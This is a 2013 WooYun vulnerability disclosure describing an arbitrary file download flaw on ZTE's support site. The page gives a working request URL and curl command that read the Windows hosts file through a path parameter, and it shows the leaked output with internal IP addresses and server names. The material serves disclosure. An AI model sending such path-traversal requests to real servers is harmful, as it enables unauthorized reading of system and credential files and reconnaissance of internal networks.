当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019327

漏洞标题:ZTE中兴SUPPORT站文件下载漏洞

相关厂商:ZTE中兴

漏洞作者: 大肠精

提交时间:2013-03-03 15:49

修复时间:2013-04-17 15:49

公开时间:2013-04-17 15:49

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-04-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

不好细说

详细说明:

进入SUPPORT站后随意注册一个帐号,然后打开下面的页面
http://support.zte.com.cn/support/FileCenter/SptDownload.aspx?path=c:\WINDOWS\system32\drivers\etc\hosts&fileName=addd.txt&type=tsm
可以把hosts文件下载下来

漏洞证明:

curl 'http://support.zte.com.cn/support/FileCenter/SptDownload.aspx?path=c:\WINDOWS\system32\drivers\etc\hosts&fileName=addd.txt&type=tsm'
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
192.168.168.14 support-web1
10.30.1.26 baksvr
10.30.18.43 RSAAM1
10.30.18.44 RSAAM2
58.60.230.74 ascs.ztems.com

修复方案:

版权声明:转载请注明来源 大肠精@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝